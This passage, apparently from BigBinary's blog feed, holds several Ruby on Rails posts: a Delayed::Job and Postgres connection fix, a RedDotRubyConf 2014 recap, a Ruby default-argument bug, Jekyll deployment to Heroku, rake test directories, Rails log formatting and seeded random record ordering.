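# Serialize and deserialize, as the JSON cookie serializer does between requests.
restored = JSON.parse(JSON.generate(flash))

puts restored.keys.inspect      # => ["notice"] -- the symbol key is now a string
puts restored["notice"].inspect # => "Saved!"
puts restored[:notice].inspect  # => nil -- symbol access no longer works
```

This is exactly why the helper above calls `type.to_s` before comparing.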
    </entry><entry>
       <title><![CDATA[Issue with Delayed Job lifecycle and Postgres Errors]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/delayed-job-lifecycle-issue"/>
      <updated>2014-07-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/delayed-job-lifecycle-issue</id>
      <content type="html"><![CDATA[<p>Recently, in one of our projects, we experienced some strange errors from <a href="https://github.com/collectiveidea/delayed_job">Delayed::Job</a>. <code>Delayed::Job</code> workers started successfully, but when they started locking jobs, the workers failed with <code>PG::Error: no connection to server</code> or <code>PG::Error: FATAL: invalid frontend message type 60</code> errors.</p><p>After some searching, we found that such issues had already been <a href="https://github.com/collectiveidea/delayed_job/issues/473">experienced</a> by others (the link is no longer available).</p><p>We started isolating the problem and digging through the recent changes we had made to the project. Since the last release, the only significant modification had been to internationalization: we had started using <a href="https://github.com/svenfuchs/i18n-active_record">I18n-active_record</a>.</p><pre><code class="language-ruby"># config/initializers/locale.rb
require 'i18n/backend/active_record'

Translation = I18n::Backend::ActiveRecord::Translation

if (ActiveRecord::Base.connected? &amp;&amp; Translation.table_exists?) || in_delayed_job_process?
  I18n.backend = I18n::Backend::ActiveRecord.new
  I18n::Backend::ActiveRecord.send(:include, I18n::Backend::Memoize)
  I18n::Backend::ActiveRecord.send(:include, I18n::Backend::Flatten)
  I18n::Backend::Simple.send(:include, I18n::Backend::Memoize)
  I18n::Backend::Simple.send(:include, I18n::Backend::Pluralization)
  I18n.backend = I18n::Backend::Chain.new(I18n::Backend::Simple.new, I18n.backend)
end</code></pre><p>For Delayed Job we had an extra check:</p><pre><code class="language-ruby">def in_delayed_job_process?
  executable_name = File.basename $0
  arguments = $*
  rake_args_regex = /\Ajobs:/
  (executable_name == 'delayed_job') ||
    (executable_name == 'rake' &amp;&amp; arguments.find { |v| v =~ rake_args_regex })
end</code></pre><p>After some serious searching and digging through both the <code>Delayed::Job</code> source code and how we were setting up its config, we started noticing some issues.</p><p>The first thing we found was that the problem did not turn up when delayed job workers were started using the <code>rake jobs:work</code> task.</p><p>Looking at DelayedJob internals, we found that the main difference between the rake task and the binstub was the <code>fork</code> method invoked in the binstub version. The binstub version was executed using the <code>Daemons#run_process</code> method and had a slightly different execution lifecycle.</p><h2>DelayedJob lifecycle</h2><p>Let's take a look into DelayedJob internals before proceeding. DelayedJob has a system of hooks that can be used by plugin writers and in our applications. All this event functionality lives in the <code>Delayed::Lifecycle</code> class.
Each worker has its own instance of that class.</p><p>So, which events exactly do we have here?</p><p>Job-related events:</p><pre><code class="language-ruby">:enqueue
:perform
:error
:failure
:invoke_job</code></pre><p>Worker-related events:</p><pre><code class="language-ruby">:execute
:loop
:perform
:error
:failure</code></pre><p>You can set up callbacks to be run on <code>before</code>, <code>after</code> or <code>around</code> events simply by using the <code>Delayed::Worker.lifecycle.before</code>, <code>Delayed::Worker.lifecycle.after</code> and <code>Delayed::Worker.lifecycle.around</code> methods.</p><h2>The Solution</h2><p>Let's move on to our problem. It turned out that the <a href="https://github.com/collectiveidea/delayed_job_active_record">delayed job active record</a> gem was closing all database connections in the <code>before_fork</code> hook and re-establishing them in the <code>after_fork</code> hook. It was clear that I18n-active_record did not play well with this, causing the issue at hand.</p><p>We looked into the DelayedJob lifecycle and chose the <code>before :execute</code> hook, which is executed after all of DelayedJob's ActiveRecord backend connection manipulations.</p><p>Finally, the locales initializer for delayed_job workers was changed as below:</p><pre><code class="language-ruby">require 'i18n/backend/active_record'

Translation = I18n::Backend::ActiveRecord::Translation

Delayed::Worker.lifecycle.before :execute do
  if (ActiveRecord::Base.connected? &amp;&amp; Translation.table_exists?) || in_delayed_job_process?
    I18n.backend = I18n::Backend::ActiveRecord.new
    I18n::Backend::ActiveRecord.send(:include, I18n::Backend::Memoize)
    I18n::Backend::ActiveRecord.send(:include, I18n::Backend::Flatten)
    I18n::Backend::Simple.send(:include, I18n::Backend::Memoize)
    I18n::Backend::Simple.send(:include, I18n::Backend::Pluralization)
    I18n.backend = I18n::Backend::Chain.new(I18n::Backend::Simple.new, I18n.backend)
  end
end</code></pre><p>This helped us mitigate the connection errors, and connections stopped dying abruptly.</p>]]></content>
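The before/after hook mechanism described above can be modeled in a few lines of plain Ruby. This is a deliberately simplified sketch of how a lifecycle object wraps an event with callbacks; the real `Delayed::Lifecycle` also supports named events and `around` callbacks, and the class and method names here are illustrative only.

```ruby
# Simplified model of a lifecycle event with before/after callbacks.
# Not the real Delayed::Lifecycle API -- just the idea behind it.
class MiniLifecycle
  def initialize
    @before = []
    @after = []
  end

  def before(callback)
    @before.push(callback)
  end

  def after(callback)
    @after.push(callback)
  end

  # Runs all before callbacks, then the event body, then all after callbacks.
  def run_callbacks
    @before.each { |cb| cb.call }
    result = yield
    @after.each { |cb| cb.call }
    result
  end
end

lifecycle = MiniLifecycle.new
order = []
lifecycle.before(-> { order.push(:before) }) # e.g. re-establish DB connections here
lifecycle.after(-> { order.push(:after) })
lifecycle.run_callbacks { order.push(:execute) }
puts order.inspect # => [:before, :execute, :after]
```

A `before :execute` callback, as used in the fix above, simply runs in the "before" slot of the worker's `:execute` event, after the fork-related connection handling has finished.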
    </entry><entry>
       <title><![CDATA[RedDotRubyConf 2014]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/reddotrubyconf"/>
      <updated>2014-07-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/reddotrubyconf</id>
      <content type="html"><![CDATA[<p><img src="/blog_images/2014/reddotrubyconf/reddotrubyconf2014_logo.png" alt="RedDotRubyConf2014logo"></p><p><a href="http://twitter.com/vipulnsward">Vipul</a> and I recently gave a talk at <a href="http://reddotrubyconf.com">RedDotRubyConf</a> on <strong><em>ActiveRecord can't do it? Arel can!</em></strong>. It was our first trip to Singapore and we enjoyed the conference, as well as Singapore, a lot.</p><p>RDRC2014 was awesome.</p><h2>Day 1</h2><p>We reached the venue in time for <a href="https://twitter.com/_ko1">Koichi's</a> keynote on <strong><em><a href="http://www.atdot.net/~ko1/activities/2014_reddotrubyconf_pub.pdf">Ruby.Inspect</a></em></strong>. He talked about various things related to the development of Ruby, including the Ruby team at Heroku, recent releases of Ruby and new syntax introduced in Ruby 2.1. He also talked about performance improvements, including the generational GC (<strong><em>RGenGC</em></strong>) and upcoming features in Ruby 2.2.</p><p>In the second part of the talk, he covered the inspection tools available in Ruby. It was a deeply technical part for me and something to learn from. The message of the talk was to become a <strong><em>low level engineer</em></strong>.</p><p>The second talk of the conf was from <a href="https://twitter.com/tjschuck">T.J. Schuck</a> about solving one of the hardest problems: <strong><em><a href="https://speakerdeck.com/tjschuck/80-000-plaintext-passwords-an-open-source-love-story-in-three-acts">Storing and retrieving passwords in a secure way</a></em></strong>. He talked about how continuing improvements in hardware pose a challenge: even if you use a proper algorithm, it can be cracked with high-powered machines. It was interesting to learn about the internals of storing passwords.
I had never cared too much about it before :)</p><p>After the coffee break, <a href="https://twitter.com/bkeepers">Brandon Keepers</a> from Github gave a talk on <strong><em><a href="https://speakerdeck.com/bkeepers/tending-your-open-source-garden">Tending Your Open Source Garden</a></em></strong>. Github is still on Rails 2.3 and Brandon is working on bringing it up to a newer version. His talk was great advice for those who want to contribute to open source and the community. I think this talk resonated well with the audience, as most of the crowd was new to and interested in open source contributions.</p><p><a href="https://twitter.com/gautamrege">Gautam Rege</a> from Josh Software gave a talk on the <strong><em><a href="http://www.slideshare.net/gautamrege/reddot-ruby-conf-2014-dark-side-of-ruby">Dark Side of Ruby</a></em></strong>. We had attended this talk at GCRC, so we left the hall after some time and did one last practice run of our own talk. But I heard the feedback for this talk was very good.</p><p>After lunch, <a href="https://twitter.com/keithpitt">Keith Pitt</a> talked about a <strong><em>Guide to Continuous Deployment with Rails</em></strong>. He talked about keeping everything related to deployment, from CI to migrations, in sync. One interesting thing I learned from this talk was how to enable zero downtime deployments on Heroku using the preboot feature.</p><p><a href="https://twitter.com/bentanweihao">Benjamin Tan</a> gave a talk on <strong><em><a href="https://speakerdeck.com/benjamintan/ruby-plus-elixir-polyglottin-ftw">Ruby + Elixir: Polyglotting FTW!</a></em></strong> after that. He talked about Elixir. This talk was about looking beyond Ruby and adding another tool to our skill set. Benjamin also gave some demos, including a final one in which he used Sidekiq with Elixir; the actual work was done by Elixir workers. I will definitely give Elixir a shot in the coming days.</p><p>After that we gave our talk on <strong><em><a href="http://github.com/rails/arel">Arel</a></em></strong>.
I was a bit nervous as it was my first talk, but it went well. We finished a bit earlier than expected, but there was a tea break after our talk :). We got some good feedback from the attendees, especially beginners who had not used Arel before. Our slides are <a href="https://docs.google.com/presentation/d/1O4jYDnq8d0lSu3D2c_khKPkQ2GKCm1Fw0y1nQacmwVc/pub#slide=id.p">here</a>.</p><p>After the tea break, the lightning talks started. The first was by <a href="https://twitter.com/hsbt">Hiroshi Shibata</a> about how anyone can <strong><em><a href="https://speakerdeck.com/hsbt/how-to-improve-experiences-of-ruby">contribute to Ruby</a></em></strong> to make it better. He talked about how to submit issues and feature requests using Redmine. After that, <a href="https://twitter.com/pluswn">William Notowidagdo</a> gave a talk on <strong><em>Building a REST API using Grape</em></strong>. With Rails and the Rails API gem it has become easy to generate an API, but we also have Grape as a lightweight tool. <a href="https://twitter.com/sayanee_">Sayani Basu</a> talked about how to make a <strong><em><a href="https://speakerdeck.com/sayanee/podcasting-with-jekyll">podcast with Jekyll and other tools</a></em></strong> in 5 minutes.</p><p>We are planning to start a podcast about the Ruby community here in India, so it was good to know about this.</p><p>After these awesome lightning talks, the last session of day 1 started. There were talks on Fluentd and domain-driven design; both were good to know as something outside the daily routine. <a href="https://twitter.com/konstantinhaase">Konstantin Haase's</a> <a href="https://speakerdeck.com/rkh/reddotrubyconf-2014-magenta-is-a-lie-and-other-tales-of-abstraction">last talk</a> of the day was a <strong><em>meta</em></strong> talk. He talked about abstraction and how it happens in our minds. Our mind affects what we see (like the color magenta); similarly, abstraction happens in the mind. I had to concentrate a lot in this talk to understand it.
But it was worth it.</p><p>And that ended the first day of the conf. It was exciting, and we were looking forward to the second day.</p><h2>Day 2</h2><p>Day 2 started with <a href="https://twitter.com/brinary">Brian Helmkamp's</a> talk on <strong><em>Docker</em></strong>. We missed the initial part of the talk. He talked about the basics of Docker and how to deploy in a container environment. He also discussed deploying a Rails app using Docker and how it makes it very easy to deploy different parts of the system.</p><p><a href="https://twitter.com/_zzak">Zachary Scott</a> gave the next talk, introducing the <strong><em><a href="https://speakerdeck.com/zzak/reddotrubyconf-2014-ruby-core-for-tenderfeet">Ruby Core team</a></em></strong>: how it works, how it collaborates, developer meetings, and how anyone can contribute to MRI. We also had a Friday hug in this talk :) This talk, combined with Hiroshi's lightning talk on the first day, was a great insight into CRuby development.</p><p>After the break, <a href="https://twitter.com/_solnic_">Piotr Solnica</a> gave an excellent talk on <strong><em><a href="https://speakerdeck.com/solnic/convenience-vs-simplicity">Convenience vs Simplicity</a></em></strong>. He talked about how the convenience offered by ActiveRecord may not be simple to understand. Things such as input conversion and validation are convenient to use as a developer, but not necessarily simple to understand. He also discussed presenters, immutable data structures, and <a href="http://github.com/dkubb/adamantium">Adamantium</a> for creating immutable objects in Ruby. In the second part of the talk, he talked about relations and how they can be used in composing queries. He explained this idea using <a href="https://github.com/rom-rb">Ruby Object Mapper</a>. It uses <a href="https://github.com/rom-rb/axiom">Axiom</a> as the underlying relational algebra instead of Arel.
It's an interesting project to check out.</p><p>After that, our very own <a href="https://twitter.com/anildigital">Anil Wadghule</a> talked on <strong><em><a href="https://speakerdeck.com/anildigital/solid-design-principles-in-ruby">Solid Design Principles in Ruby</a></em></strong>. His emphasis was on following design principles rather than patterns. He also showed code examples and refactored them by applying the principles. His talk was a good way to understand what the SOLID principles are and how they can be applied in real life.</p><p>We skipped the session after lunch and roamed around talking with people. We had an interesting discussion about hiring Ruby on Rails developers, interview processes, etc.</p><p>Then the lightning talks started. <a href="https://twitter.com/code_ssl">Sheng-Loong Su</a> talked first on using <strong><em><a href="https://speakerdeck.com/sushengloong/algorithmic-trading-for-fun-and-profit-red-dot-ruby-conf-2014">Algorithms for Trading</a></em></strong>. He talked about collecting data using a feeder, preparing trading signals using a strategy, and making decisions based on those trading signals. One of the best talks of day 2 was by <a href="https://twitter.com/arnvald">Grzegorz Witek</a> on how he is traveling the world without getting burned out while still happily programming. He talked about his experiences in different countries as a <strong><em><a href="https://speakerdeck.com/arnvald/nomadic-programmer">Nomadic Programmer</a></em></strong>. It was one of the most inspirational talks, in my opinion. The last lightning talk was about <strong><em>Using Vagrant for setting up a dev environment</em></strong> by <a href="https://twitter.com/fsw0723">Shuwei</a> and <a href="">Arathi</a>.</p><p><a href="https://twitter.com/fullstackcoder">Nicholas Simmons</a> talked about the experience of building a <strong><em><a href="https://speakerdeck.com/fullstackcoder/reddotrubyconf2014">Single page web app and back again</a></em></strong> to a normal app.
He gave real-life metrics from Shopify and showed the problems they faced with single page apps and batman.js, and how moving back to a normal app helped them.</p><p>Then the chocolate man from Belgium, <a href="https://twitter.com/_toch">Christophe Philemotte</a>, gave a talk on <strong><em><a href="https://speakerdeck.com/toch/rdrc-2014-safety-nets-learn-to-code-with-confidence">Safety Nets: Learn to code with confidence</a></em></strong>. His talk was about how we can protect code in the long term using testing and static analysis, with tools such as flog, flay and rubocop for removing duplication, reducing complexity and fixing warnings. He also talked about the importance of code review. His code is available <a href="https://github.com/8thcolor/rdrc2014-safetynets">here</a>. He also gave us excellent chocolates from Belgium.</p><p>And then came the last keynote, by <a href="https://twitter.com/tenderlove">Aaron Patterson</a>. As always, it was full of everything: tech stuff, jokes, puns.</p><p>He talked about how he is making performance improvements in Active Record and link generation. He showed graphs with the performance of various database adapters tested on Rails versions ranging from 2.3 through 4 to master. He urged everyone to report performance issues to the core team so that they are addressed quickly. This is the <a href="https://github.com/tenderlove/ko1-test-app">app</a> he used for performance testing.</p><p>And that ended the talks at RDRC. We had an awesome after party where we discussed Ruby, Rails and other things with lots of people. We would like to thank <a href="https://twitter.com/winstonyw">Winston</a> for inviting us to RedDotRubyConf.</p><p>I am already looking forward to RDRC 2015.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Six Year Old Optional / Keyword Arguments bug]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/six-years-old-optional-keyword-arguments-bug"/>
      <updated>2014-04-28T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/six-years-old-optional-keyword-arguments-bug</id>
      <content type="html"><![CDATA[<p>I recently conducted a workshop about <strong><em>Contributing to Open Source</em></strong> at the first-ever <a href="http://rubyconf.ph/">Rubyconf Philippines</a>. In the introductory talk, I spoke about how Aaron Patterson fixed <a href="https://github.com/rails/rails/commit/e88da370f190cabd1e9750c5b3531735950ab415">a 6 year old bug</a> about optional arguments that existed in Rails.</p><h2>Bug in ruby</h2><p>Let's try a small program.</p><pre><code class="language-ruby">class Lab
  def day
    puts 'invoked'
    'sunday'
  end

  def run
    day = day
  end
end

puts Lab.new.run</code></pre><p>What do you think would be printed on your terminal when you run the above program?</p><p>If you are using ruby 2.1 or below, you will see nothing. Why is that? That's because of a bug in ruby.</p><p>This is <a href="https://bugs.ruby-lang.org/issues/9593">bug number 9593</a> in the ruby issue tracker.</p><p>In the statement <code>day = day</code>, the left hand side variable assignment stops the call to the method <code>day</code>, so the method <code>day</code> is never invoked.</p><h2>Another variation of the same bug</h2><pre><code class="language-ruby">class Lab
  def day
    puts 'invoked'
    'sunday'
  end

  def run(day: day)
  end
end

puts Lab.new.run</code></pre><p>In the above case we are using the keyword argument feature added in Ruby 2.0. If you are unfamiliar with the keyword arguments feature of ruby, check out this <a href="https://www.youtube.com/watch?v=u8Q6Of_mScI">excellent video</a> by <a href="https://twitter.com/peterc">Peter Cooper</a>.</p><p>In this case the same behavior is exhibited again: the method <code>day</code> is never invoked.</p><h2>How this bug affects the Rails community</h2><p>You might be thinking that you would never write code like that.
Why would you have a variable with the same name as a method?</p><p>Well, Rails had this bug because it had code like this.</p><pre><code class="language-ruby">def has_cached_counter?(reflection = reflection)
end</code></pre><p>In this case the method <code>reflection</code> never got called and the variable <code>reflection</code> was always assigned nil.</p><h2>Fixing the bug</h2><p><a href="https://bugs.ruby-lang.org/users/4">Nobu</a> <a href="https://bugs.ruby-lang.org/projects/ruby-trunk/repository/revisions/45272">fixed</a> this bug in ruby 2.2.0. By the way, Nobu is also known as the &quot;ruby patch monster&quot; because of the number of patches he applies to ruby.</p><p>So this bug is fixed in ruby 2.2.0. What about people who are not using ruby 2.2.0?</p><p>The simple solution is not to omit the parentheses. If we change the above code to</p><pre><code class="language-ruby">def has_cached_counter?(reflection = reflection())
end</code></pre><p>then we are explicitly invoking the method <code>reflection</code>, and the variable <code>reflection</code> will be assigned the output of the method <code>reflection</code>.</p><p>And this is how <a href="https://github.com/rails/rails/commit/e88da370f190cabd1e9750c5b3531735950ab415">Aaron Patterson fixed</a> the six-year-old bug.</p>]]></content>
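The parentheses workaround can be verified on any Ruby version with a small standalone script. Class and method names here are illustrative, not taken from Rails.

```ruby
class Lab
  def day
    'sunday'
  end

  # Ambiguous: on old rubies, a default written as `day = day` reads the
  # just-declared parameter (nil) instead of calling the method, and newer
  # rubies reject the circular reference outright, so it is left commented out:
  # def broken(day = day); day; end

  # Unambiguous: `day()` with parentheses is always a method call,
  # so the default value is the string returned by the #day method.
  def fixed(day = day())
    day
  end
end

puts Lab.new.fixed # => sunday
```

The explicit `()` is exactly the shape of the Rails fix shown above.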
    </entry><entry>
       <title><![CDATA[How to deploy jekyll site to heroku]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/deploy-jekyll-to-heroku"/>
      <updated>2014-04-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/deploy-jekyll-to-heroku</id>
      <content type="html"><![CDATA[<p><a href="http://jekyllrb.com">jekyll</a> is an excellent tool for creating static pages and blogs. Our <a href="https://bigbinary.com/blog">BigBinary blog</a> is based on jekyll. Deploying our blog to heroku took longer than I had expected. I am outlining what I did to deploy the <a href="https://bigbinary.com/blog">BigBinary blog</a> to heroku.</p><h2>Add exclude vendor to _config.yml</h2><p>Open <code>_config.yml</code> and add the following line at the very bottom.</p><pre><code class="language-ruby">exclude: ['vendor']</code></pre><h2>Add Procfile</h2><p>Create a new file called <code>Procfile</code> at the root of the project with the following content.</p><pre><code class="language-ruby">web: bundle exec jekyll build &amp;&amp; bundle exec thin start -p $PORT -V
console: echo console
rake: echo rake</code></pre><h2>Add Gemfile</h2><p>Add a <code>Gemfile</code> at the root of the project.</p><pre><code class="language-ruby">source 'https://rubygems.org'

gem 'jekyll', '2.4.0'
gem 'rake'
gem 'foreman'
gem 'thin'
gem 'rack-contrib'</code></pre><h2>Add config.ru</h2><p>Add a <code>config.ru</code> at the root of the project with the following content.</p><pre><code class="language-ruby">require 'rack/contrib/try_static'

use Rack::TryStatic,
  :root =&gt; &quot;_site&quot;,
  :urls =&gt; %w[/],
  :try  =&gt; ['.html', 'index.html', '/index.html']

run lambda { |env|
  return [404, {'Content-Type' =&gt; 'text/html'}, ['Not Found']]
}</code></pre><h2>Test on local machine first</h2><p>Test locally by executing <code>bundle exec jekyll serve</code>.</p><h2>Push code to heroku</h2><p>Now run <em>bundle install</em>, add the <em>Gemfile.lock</em> to the repository and push the repository to heroku.</p>]]></content>
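The `:try` option is what lets a request for `/` resolve to `_site/index.html`. The lookup logic can be sketched in plain Ruby; this `try_static` helper is hypothetical, written only to illustrate the idea, while the real implementation lives inside Rack::TryStatic.

```ruby
require 'tmpdir'
require 'fileutils'

# Hypothetical sketch of the Rack::TryStatic lookup: for a requested path,
# try the path itself plus each suffix from :try until an existing file is found.
def try_static(root, path, tries)
  candidates = [path] + tries.map { |suffix| path.chomp('/') + suffix }
  candidates.map { |candidate| File.join(root, candidate) }
            .find { |file| File.file?(file) }
end

Dir.mktmpdir do |site|
  FileUtils.touch(File.join(site, 'index.html'))
  # A request for "/" resolves to root/index.html via the '/index.html' suffix.
  resolved = try_static(site, '/', ['.html', 'index.html', '/index.html'])
  puts resolved.end_with?('index.html') # => true
end
```

When nothing matches, the helper returns nil, which corresponds to the 404 lambda at the bottom of `config.ru`.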
    </entry><entry>
       <title><![CDATA[How to add additional directories to test]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/adding-directory-to-rake-test"/>
      <updated>2014-04-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/adding-directory-to-rake-test</id>
      <content type="html"><![CDATA[<p>In a project we needed to write different parsers for different services. Rather than putting all those parsers in <em>app/models</em> or in <em>lib</em>, we created a new directory and put all the parsers in <em>app/parsers</em>.</p><p>We put all the tests for these parsers in the <em>test/parsers</em> directory.</p><p>We can run parser tests individually by executing <em>rake test test/parsers/email_parser_test.rb</em>. However, when we run <em>rake</em>, the tests in <em>test/parsers</em> are not picked up.</p><p>We added the following code to the <em>Rakefile</em> to make <em>rake</em> pick up the tests in <em>test/parsers</em>.</p><pre><code class="language-ruby"># Adding test/parsers directory to rake test.
namespace :test do
  desc &quot;Test tests/parsers/* code&quot;
  Rails::TestTask.new(parsers: 'test:prepare') do |t|
    t.pattern = 'test/parsers/**/*_test.rb'
  end
end

Rake::Task['test:run'].enhance [&quot;test:parsers&quot;]</code></pre><p>Now when we run <em>rake</em> or <em>rake test</em>, the tests under <em>test/parsers</em> are also picked up.</p><p>The above code adds a rake task, <em>rake test:parsers</em>, which runs all tests under the <em>test/parsers</em> directory.</p><p>We can see this task by executing <em>rake -T test</em>.</p><pre><code class="language-plaintext">$ rake -T test
rake test         # Runs test:units, test:functionals, test:integration together
rake test:all     # Run tests quickly by merging all types and not resetting db
rake test:all:db  # Run tests quickly, but also reset db
rake test:parsers # Test tests/parsers/* code
rake test:recent  # Run tests for {:recent=&gt;[&quot;test:deprecated&quot;, &quot;test:prepare&quot;]} / Deprecated; Test recent changes</code></pre>]]></content>
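The `enhance` call is what chains the new task into the default run: it appends prerequisites to an already-defined task. A minimal standalone demonstration with plain Rake follows; the task names are illustrative, standing in for `test:run` and `test:parsers`.

```ruby
require 'rake'

order = []

# Define two tasks, then make :parsers a prerequisite of :run via #enhance,
# mirroring Rake::Task['test:run'].enhance(["test:parsers"]) above.
run_task = Rake::Task.define_task(:run) { order.push(:run) }
Rake::Task.define_task(:parsers) { order.push(:parsers) }
run_task.enhance([:parsers])

# Invoking :run now runs :parsers first, then :run itself.
run_task.invoke
puts order.inspect # => [:parsers, :run]
```

This is why plain `rake` (whose default ultimately invokes `test:run`) now also runs the parser tests.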
    </entry><entry>
       <title><![CDATA[Configuring Log Formatting in Rails]]></title>
       <author><name>Vipul</name></author>
      <link href="https://www.bigbinary.com/blog/logger-formatting-in-rails"/>
      <updated>2014-03-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/logger-formatting-in-rails</id>
      <content type="html"><![CDATA[<p>Ideally we should be able to log an exception in Rails like this.</p><pre><code class="language-ruby">begin
  raise &quot;Amount must be more than zero&quot;
rescue =&gt; exception
  Rails.logger.info exception
end</code></pre><p>The above code produces a one line log message as shown below.</p><pre><code class="language-plaintext">Amount must be more than zero</code></pre><p>In order to get the backtrace and other information about the exception we need to handle logging like this.</p><pre><code class="language-ruby">begin
  raise &quot;Amount must be more than zero&quot;
rescue =&gt; exception
  Rails.logger.info exception.class.to_s
  Rails.logger.info exception.to_s
  Rails.logger.info exception.backtrace.join(&quot;\n&quot;)
end</code></pre><p>The above code produces the following log message.</p><pre><code class="language-plaintext">RuntimeError
Amount must be more than zero
/Users/nsingh/code/bigbinary_llc/wheel/app/controllers/home_controller.rb:5:in `index'
/Users/nsingh/.rbenv/versions/2.0.0-p247/lib/ruby/gems/2.0.0/gems/actionpack-4.0.2/lib/action_controller/metal/implicit_render.rb:4:in `send_action'
/Users/nsingh/.rbenv/versions/2.0.0-p247</code></pre><p>Now let's look at why the Rails logger does not produce detailed logging and what can be done about it.</p><h2>A closer look at formatters</h2><p>When we use <code>Rails.logger.info(exception)</code> the output is formatted by <code>ActiveSupport::Logger::SimpleFormatter</code>. It is a custom formatter defined by Rails that looks like this.</p><pre><code class="language-ruby"># Simple formatter which only displays the message.
class SimpleFormatter &lt; ::Logger::Formatter
  # This method is invoked when a log event occurs
  def call(severity, timestamp, progname, msg)
    &quot;#{String === msg ? msg : msg.inspect}\n&quot;
  end
end</code></pre><p>As we can see it inherits from <code>Logger::Formatter</code> defined by the <a href="http://www.ruby-doc.org/stdlib-2.1.0/libdoc/logger/rdoc/Logger.html">Ruby Logger</a>. It then overrides the <code>call</code> method, which is originally defined as</p><pre><code class="language-ruby">Format = &quot;%s, [%s#%d] %5s -- %s: %s\n&quot;

def call(severity, time, progname, msg)
  Format % [severity[0..0], format_datetime(time), $$, severity, progname,
    msg2str(msg)]
end

...

def msg2str(msg)
  case msg
  when ::String
    msg
  when ::Exception
    &quot;#{ msg.message } (#{ msg.class })\n&quot; &lt;&lt;
      (msg.backtrace || []).join(&quot;\n&quot;)
  else
    msg.inspect
  end
end</code></pre><p>When an exception object is passed to <code>SimpleFormatter</code>, <code>msg.inspect</code> is called, and that's why we see the exception message without any backtrace.</p><p>The problem is that Rails's SimpleFormatter's <code>call</code> method is a bit dumb compared to Ruby logger's <code>call</code> method.</p><p>Ruby logger's method has a special check for exception messages. 
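</p><p>As a side note, the gap can also be closed with a small custom formatter. The sketch below is illustrative (the class name <code>ExceptionAwareFormatter</code> is mine, not from this post); it simply mirrors what Ruby logger's <code>msg2str</code> does for exceptions:</p>

```ruby
require "logger"

# Illustrative sketch: a formatter that, unlike Rails's SimpleFormatter,
# prints the exception class and backtrace when the message is an Exception.
class ExceptionAwareFormatter < ::Logger::Formatter
  def call(severity, timestamp, progname, msg)
    text =
      case msg
      when ::String
        msg
      when ::Exception
        "#{msg.message} (#{msg.class})\n" + (msg.backtrace || []).join("\n")
      else
        msg.inspect
      end
    "#{text}\n"
  end
end

logger = Logger.new($stdout)
logger.formatter = ExceptionAwareFormatter.new

begin
  raise "Amount must be more than zero"
rescue => exception
  logger.info exception   # message, class and backtrace, one per line
end
```

<p>Assigning such a formatter via <code>Rails.logger.formatter =</code> would be an alternative to swapping out the whole logger.</p><p>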
If the message it is going to print is of class <code>Exception</code>, it prints the backtrace too. In comparison, <code>SimpleFormatter</code> just prints <code>msg.inspect</code> for objects of the <code>Exception</code> class.</p><h2>Configuring the logger</h2><p>This problem can be solved by using <code>config.logger</code>.</p><p>From the <a href="http://guides.rubyonrails.org/configuring.html">Rails Configuring Guide</a> we have</p><blockquote><p><code>config.logger</code> accepts a logger conforming to the interface of Log4r or the default Ruby Logger class. Defaults to an instance of <code>ActiveSupport::Logger</code>, with auto flushing off in production mode.</p></blockquote><p>So now we can configure the Rails logger not to be <code>SimpleFormatter</code> and go back to Ruby's logger.</p><p>Let's set <code>config.logger = ::Logger.new(STDOUT)</code> in <code>config/application.rb</code> and then try the following code.</p><pre><code class="language-ruby">begin
  raise &quot;Amount must be more than zero&quot;
rescue =&gt; exception
  Rails.logger.info exception
end</code></pre><p>Now the above code produces the following log message.</p><pre><code class="language-plaintext">I, [2013-12-17T01:05:41.944859 #13537]  INFO -- : Amount must be more than zero (RuntimeError)
test_app/app/controllers/page_controller.rb:3:in `index'
/Users/sward/.rbenv/versions/2.0.0-p353/lib/ruby/gems/2.0.0/gems/actionpack-4.0.2/lib/action_controller/metal/implicit_render.rb:4:in `send_action'
/Users/sward/.rbenv/versions/2.0.0-p353/lib/ruby/gems/2.0.0/gems/actionpack-4.0.2/lib/abstract_controller/base.rb:189:in `process_action'
/Users/sward/.rbenv/versions/2.0.0-p353/lib/ruby/gems/2.0.0/gems/actionpack-4.0.2/lib/action_controller/metal/rendering.rb:10:in `process_action'
...&lt;snip&gt;...</code></pre><h2>Sending log to STDOUT is also a good practice</h2><p>As per <a href="http://12factor.net/logs">http://12factor.net/logs</a>, an application should not concern itself much with the kind of logging framework being used. The application should write its log to STDOUT, and logging frameworks should operate on log streams.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Displaying non repeating random records]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/non-repeating-random-records"/>
      <updated>2013-11-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/non-repeating-random-records</id>
      <content type="html"><![CDATA[<p>For one of our clients we need to display random records from the database. That's easy enough. We can use the <code>random()</code> function.</p><pre><code class="language-ruby">Batch.published_and_featured.order('random()')
                            .paginate(per_page: 20, page: params[:page])</code></pre><p>Here we are using a PostgreSQL database. MySQL has an equivalent function called <code>RAND()</code>.</p><p>The problem here is that if the user clicks on the next page then we will try to get the next set of 20 random records. And since these records are truly random, sometimes the user might see records which have already been seen on the first page.</p><p>The fix is to make it random but not truly random. It needs to be random with a seed.</p><h2>Fix in MySQL</h2><p>In MySQL we can pass the seed directly to the <code>RAND()</code> function.</p><pre><code class="language-ruby">Batch.published_and_featured.order('RAND(0.3)')
                            .paginate(per_page: 20, page: params[:page])</code></pre><h2>Fix in PostgreSQL</h2><p>In PostgreSQL it is a little more cumbersome. We first need to set the seed, and then the subsequent query's usage of <code>random()</code> will make use of the seed value.</p><pre><code class="language-ruby">Batch.connection.execute &quot;SELECT setseed(0.2)&quot;
Batch.published_and_featured.order('random()')
